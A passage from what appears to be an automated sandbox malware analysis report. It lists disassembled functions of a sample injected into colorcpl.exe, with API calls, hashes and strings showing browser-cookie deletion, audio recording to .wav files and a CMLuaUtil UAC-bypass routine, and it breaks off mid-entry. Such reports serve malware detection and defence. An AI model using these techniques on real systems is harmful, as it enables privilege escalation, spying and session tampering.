                                                                                                                              • waveInAddBuffer.WINMM(046D2A88,00000020), ref: 04661E4F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                              • String ID: %Y-%m-%d %H.%M$.wav
                                                                                                                              • API String ID: 3809562944-3597965672
                                                                                                                              • Opcode ID: b1e1afd9991fa664f3acd2854139c9b2b74651b6feec97ed7e0b3f23d33f7a0c
                                                                                                                              • Instruction ID: cd7763167ed623491cf037e2f5ce07f68b6fbb3548cd5a6d1b0bb171f62a2bf3
                                                                                                                              • Opcode Fuzzy Hash: b1e1afd9991fa664f3acd2854139c9b2b74651b6feec97ed7e0b3f23d33f7a0c
                                                                                                                              • Instruction Fuzzy Hash: E0316D719043059FE324EB20D865ADA77E8EB55319F44486DE14B92190FF34BD09CB9A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 046735A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 046735CA
                                                                                                                                • Part of subcall function 046735A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 046735E7
                                                                                                                                • Part of subcall function 046735A6: RegCloseKey.KERNEL32(?), ref: 046735F2
                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0466BF6B
                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 0466BF78
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                              • API String ID: 1133728706-4073444585
                                                                                                                              • Opcode ID: 08d3fa05559c9e80ef5a7c5debcb62a7b76e638a23fb95c517a7e8f95f1245a9
                                                                                                                              • Instruction ID: 88ba428a0239e2faaa6afe736381ffb47b91d9f328d3cbc35bf5ab3f6f324217
                                                                                                                              • Opcode Fuzzy Hash: 08d3fa05559c9e80ef5a7c5debcb62a7b76e638a23fb95c517a7e8f95f1245a9
                                                                                                                              • Instruction Fuzzy Hash: C9215E71A40119ABEB04F7B4CC698FE7768AF55708F80005DD907A7290FE31BA59CAD9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046B6B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d4fbc1c50c5e360e689a8e8ce861141be949e10646fd566757ea09b550b74052
                                                                                                                              • Instruction ID: c1f0b20cafe4b468464eae19e4be732c5e5fdfc4154895c0bbc9bf6abaf2a79f
                                                                                                                              • Opcode Fuzzy Hash: d4fbc1c50c5e360e689a8e8ce861141be949e10646fd566757ea09b550b74052
                                                                                                                              • Instruction Fuzzy Hash: A711B7B1604214BBDB216F76DC489AF7AACEB927247104219F855D6250FA34AC91CBF1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046B0EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 046B0C41: _free.LIBCMT ref: 046B0C6A
                                                                                                                              • _free.LIBCMT ref: 046B0F48
                                                                                                                                • Part of subcall function 046A6782: RtlFreeHeap.NTDLL(00000000,00000000,?,046B0C6F,0000000A,00000000,0000000A,00000000,?,046B0F13,0000000A,00000007,0000000A,?,046B145E,0000000A), ref: 046A6798
                                                                                                                                • Part of subcall function 046A6782: GetLastError.KERNEL32(0000000A,?,046B0C6F,0000000A,00000000,0000000A,00000000,?,046B0F13,0000000A,00000007,0000000A,?,046B145E,0000000A,0000000A), ref: 046A67AA
                                                                                                                              • _free.LIBCMT ref: 046B0F53
                                                                                                                              • _free.LIBCMT ref: 046B0F5E
                                                                                                                              • _free.LIBCMT ref: 046B0FB2
                                                                                                                              • _free.LIBCMT ref: 046B0FBD
                                                                                                                              • _free.LIBCMT ref: 046B0FC8
                                                                                                                              • _free.LIBCMT ref: 046B0FD3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 776569668-0
                                                                                                                              • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                              • Instruction ID: c1bce35745800a48ca4149e959b81023189f196d92d05021d1669c0bbdd64635
                                                                                                                              • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                              • Instruction Fuzzy Hash: 1F114FB1581B04BAE521BBB0CC46FCB7B9CAF00705F44481DAAEE66070EBB5FD945B94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06731C06 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 269201875-0
                                                                                                                              • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                              • Instruction ID: d942f0093e9fcd46a09b241b6be394b54d4f07e8aecb33a1eca0299060fb90f2
                                                                                                                              • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                              • Instruction Fuzzy Hash: 12114C71940BBCEAD6E0FBB0CD09FCB7BDDAF00710F814825A3A9A6152DA65B504C651
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 066F1E6F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 066F1E7C
                                                                                                                              • int.LIBCPMT ref: 066F1E8F
                                                                                                                                • Part of subcall function 066EEDCD: std::_Lockit::_Lockit.LIBCPMT ref: 066EEDDE
                                                                                                                                • Part of subcall function 066EEDCD: std::_Lockit::~_Lockit.LIBCPMT ref: 066EEDF8
                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 066F1ECF
                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 066F1ED8
                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 066F1EF6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                              • String ID: (mG
                                                                                                                              • API String ID: 2536120697-4059303827
                                                                                                                              • Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                                                                                                              • Instruction ID: f2d8a92ff244f0d4b4fe034d2863d8a86221c2093e9c138b5109e94d887b383d
                                                                                                                              • Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                                                                                                              • Instruction Fuzzy Hash: 86112C72A10114D7CBA0EBA8DC048DDBFB9DF81260F11055AEA14AB290DF329E01CBD4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0469A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetLastError.KERNEL32(?,?,0469A351,046992BE), ref: 0469A368
                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0469A376
                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0469A38F
                                                                                                                              • SetLastError.KERNEL32(00000000,?,0469A351,046992BE), ref: 0469A3E1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3852720340-0
                                                                                                                              • Opcode ID: 5cb1bed74ae639f723737448811b6dbc4e6a21ac3195c1c6372e3ca0200104ee
                                                                                                                              • Instruction ID: 9f46d5ec9c0cacfed694e544abc72a06361aa23d8524f53c308b8c2b82b9bd07
                                                                                                                              • Opcode Fuzzy Hash: 5cb1bed74ae639f723737448811b6dbc4e6a21ac3195c1c6372e3ca0200104ee
                                                                                                                              • Instruction Fuzzy Hash: ED01F53261E262AFAF153AF86CA46BA27CCEB532B9320432EE514821D0FFD56C009244
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046675B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\SysWOW64\colorcpl.exe), ref: 046675D0
                                                                                                                                • Part of subcall function 046674FD: _wcslen.LIBCMT ref: 04667521
                                                                                                                                • Part of subcall function 046674FD: CoGetObject.OLE32(?,00000024,046C6518,00000000), ref: 04667582
                                                                                                                              • CoUninitialize.OLE32 ref: 04667629
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                              • String ID: C:\Windows\SysWOW64\colorcpl.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                              • API String ID: 3851391207-3410284080
                                                                                                                              • Opcode ID: d8c6e52d5e5d0ab193ec1a2f38da36c617ad3671ad7a5152e333b92280f1061e
                                                                                                                              • Instruction ID: 59917dfb3abf42ae4fa306717c45e565791b706887e9deaec715a2858a4cf691
                                                                                                                              • Opcode Fuzzy Hash: d8c6e52d5e5d0ab193ec1a2f38da36c617ad3671ad7a5152e333b92280f1061e
                                                                                                                              • Instruction Fuzzy Hash: 55019E723113106FF328AB68EC0EE7B775CDF8172EF11052EF91686281FA91BC044AA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0466BADD
                                                                                                                              • GetLastError.KERNEL32 ref: 0466BAE7
                                                                                                                              Strings
                                                                                                                              • [Chrome Cookies found, cleared!], xrefs: 0466BB0D
                                                                                                                              • [Chrome Cookies not found], xrefs: 0466BB01
                                                                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0466BAA8
                                                                                                                              • UserProfile, xrefs: 0466BAAD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: DeleteErrorFileLast
                                                                                                                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                              • API String ID: 2018770650-304995407
                                                                                                                              • Opcode ID: 5ed721cca0b2a9cb0b466b89edd34bf3c09ac8d009dbf7628f1c3cb89c31e468
                                                                                                                              • Instruction ID: 3aa38c8c7fecd4137d809e0841c5548908bbf4c6e6bfa712241d2da5a4a72d3a
                                                                                                                              • Opcode Fuzzy Hash: 5ed721cca0b2a9cb0b466b89edd34bf3c09ac8d009dbf7628f1c3cb89c31e468
                                                                                                                              • Instruction Fuzzy Hash: 9E012D31F40119ABDB04BBB9DC5B8FE776CED12504B40115DD40392194FD627B55DBC6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A4048 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _free.LIBCMT ref: 046A4066
                                                                                                                                • Part of subcall function 046A6782: RtlFreeHeap.NTDLL(00000000,00000000,?,046B0C6F,0000000A,00000000,0000000A,00000000,?,046B0F13,0000000A,00000007,0000000A,?,046B145E,0000000A), ref: 046A6798
                                                                                                                                • Part of subcall function 046A6782: GetLastError.KERNEL32(0000000A,?,046B0C6F,0000000A,00000000,0000000A,00000000,?,046B0F13,0000000A,00000007,0000000A,?,046B145E,0000000A,0000000A), ref: 046A67AA
                                                                                                                              • _free.LIBCMT ref: 046A4078
                                                                                                                              • _free.LIBCMT ref: 046A408B
                                                                                                                              • _free.LIBCMT ref: 046A409C
                                                                                                                              • _free.LIBCMT ref: 046A40AD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                              • String ID: `.A
                                                                                                                              • API String ID: 776569668-3175770648
                                                                                                                              • Opcode ID: 9870d64f8ae5b81ae8f5f1ea6acc1c475beb997e5a75a5e72c1859bce9fad1ba
                                                                                                                              • Instruction ID: bdcb87485580c62a7a99c58cfd23ef973c998d81689ba32eddcd1cd8c7f27b0f
                                                                                                                              • Opcode Fuzzy Hash: 9870d64f8ae5b81ae8f5f1ea6acc1c475beb997e5a75a5e72c1859bce9fad1ba
                                                                                                                              • Instruction Fuzzy Hash: 50F09071C129108F9722AF18F8504453721E71972534D618AF0245A674FB789EA28FD6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0469AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __allrem.LIBCMT ref: 0469AC69
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0469AC85
                                                                                                                              • __allrem.LIBCMT ref: 0469AC9C
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0469ACBA
                                                                                                                              • __allrem.LIBCMT ref: 0469ACD1
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0469ACEF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1992179935-0
                                                                                                                              • Opcode ID: 23660a67582818b9dc4951035eb361c0185f11ba5ead73d9d51cae96f632fb9a
                                                                                                                              • Instruction ID: 2c9c10d8790da9119f3024b85b3bc526ec2f9d85c19f882bdce714c3432d19e1
                                                                                                                              • Opcode Fuzzy Hash: 23660a67582818b9dc4951035eb361c0185f11ba5ead73d9d51cae96f632fb9a
                                                                                                                              • Instruction Fuzzy Hash: 0281FB72600B469BEB249EA8CC41B6A73EDAF41324F24452EE510DB780FBF4FD458B54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0671B7E8 Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __allrem.LIBCMT ref: 0671B975
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0671B991
                                                                                                                              • __allrem.LIBCMT ref: 0671B9A8
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0671B9C6
                                                                                                                              • __allrem.LIBCMT ref: 0671B9DD
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0671B9FB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1992179935-0
                                                                                                                              • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                                                                                              • Instruction ID: 25d046c8ea3f2210a75e6680db8829e96bd0210177ce578c7077c576f47673be
                                                                                                                              • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                                                                                              • Instruction Fuzzy Hash: C8810772A007169BE7A0AE6DCC84B7A73E8EF44F24F14452FE621DF690E774D9018B94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04671CFE Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0467179C: SetLastError.KERNEL32(0000000D,04671D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04671CFA), ref: 046717A2
                                                                                                                              • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04671CFA), ref: 04671D37
                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,0466D2A2,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04671CFA), ref: 04671DA5
                                                                                                                              • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 04671DC9
                                                                                                                                • Part of subcall function 04671CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,04671DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 04671CB3
                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 04671E10
                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 04671E17
                                                                                                                              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04671F2A
                                                                                                                                • Part of subcall function 04672077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,04671F37,?,?,?,?,?), ref: 046720E7
                                                                                                                                • Part of subcall function 04672077: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 046720EE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3950776272-0
                                                                                                                              • Opcode ID: 97ef5c5e93bc75c9c08a74a4bd84e47fa1885d5b1c7e1eb05dc69e38c0c52009
                                                                                                                              • Instruction ID: cfb748f819f8fbab41ed0b187ac75130c82f7fa87ef5d64b8648a63abf28c60e
                                                                                                                              • Opcode Fuzzy Hash: 97ef5c5e93bc75c9c08a74a4bd84e47fa1885d5b1c7e1eb05dc69e38c0c52009
                                                                                                                              • Instruction Fuzzy Hash: 2661C0B0601601ABD7119F65C980BAA7BE5FF86744F04411BE9058B381FB78F856CBD1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A58F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __cftoe
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4189289331-0
                                                                                                                              • Opcode ID: 875ef276a1fffead33f7bcaa3f1f40bfa8f1ac3df85af44ab7073793060c28a1
                                                                                                                              • Instruction ID: f14a6ff2b0d7677d46905068c262c401ec3bd64d43ff817b7710553548be2c80
                                                                                                                              • Opcode Fuzzy Hash: 875ef276a1fffead33f7bcaa3f1f40bfa8f1ac3df85af44ab7073793060c28a1
                                                                                                                              • Instruction Fuzzy Hash: 2C511D32A01A05BBEB14DF58CC80FAE77A9EF49334F14421DE51696281FB31FD208E64
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06726605 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __cftoe
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4189289331-0
                                                                                                                              • Opcode ID: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
                                                                                                                              • Instruction ID: 6812487fc3ba2ac5938982bab7e57fdc7ef54e65eb0a690aa5a1e5e774d24498
                                                                                                                              • Opcode Fuzzy Hash: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
                                                                                                                              • Instruction Fuzzy Hash: 97513C72D00227ABDBE49F68DD84EBE77A8EF48330F24421BF92496291FB35D500C664
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A7571 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __freea$__alloca_probe_16_free
                                                                                                                              • String ID: a/p$am/pm
                                                                                                                              • API String ID: 2936374016-3206640213
                                                                                                                              • Opcode ID: ee88a3f97ef37d40def1cd7b5b1af40f2f02ea08df493b774a74a12d0fae6b58
                                                                                                                              • Instruction ID: acc8e79ec5e2447750928c6d899decb0828af45df0d01071789a5c9cee2875de
                                                                                                                              • Opcode Fuzzy Hash: ee88a3f97ef37d40def1cd7b5b1af40f2f02ea08df493b774a74a12d0fae6b58
                                                                                                                              • Instruction Fuzzy Hash: F5D1E231A00A06DADB28DF68C854BBAB7B1EF25302F18415AD545AB351F335FDA1CFA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04670E61 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 04670E6E
                                                                                                                              • int.LIBCPMT ref: 04670E81
                                                                                                                                • Part of subcall function 0466E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0466E0D2
                                                                                                                                • Part of subcall function 0466E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0466E0EC
                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 04670EC1
                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 04670ECA
                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 04670EE8
                                                                                                                              • __Init_thread_footer.LIBCMT ref: 04670F29
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3815856325-0
                                                                                                                              • Opcode ID: 3e19673f5def3e8268982e45d235a711439c539dca8402431c2113b8fd26cb68
                                                                                                                              • Instruction ID: 40d18fd1a91108ff06bd951a5f73bf15a81d8ebb22f51a51320df09b45d3bc2a
                                                                                                                              • Opcode Fuzzy Hash: 3e19673f5def3e8268982e45d235a711439c539dca8402431c2113b8fd26cb68
                                                                                                                              • Instruction Fuzzy Hash: B021D536905514ABEB14FBB8D8448AE77BCDF48328B20015EE915A7280FF75BD418BA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A8215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetLastError.KERNEL32(?,0469F720,0469A7F5,0469F720,046D4EF8,?,0469CE15,FF8BC35D,046D4EF8,046D4EF8), ref: 046A8219
                                                                                                                              • _free.LIBCMT ref: 046A824C
                                                                                                                              • _free.LIBCMT ref: 046A8274
                                                                                                                              • SetLastError.KERNEL32(00000000,FF8BC35D,046D4EF8,046D4EF8), ref: 046A8281
                                                                                                                              • SetLastError.KERNEL32(00000000,FF8BC35D,046D4EF8,046D4EF8), ref: 046A828D
                                                                                                                              • _abort.LIBCMT ref: 046A8293
                                                                                                                              Memory Dump Source
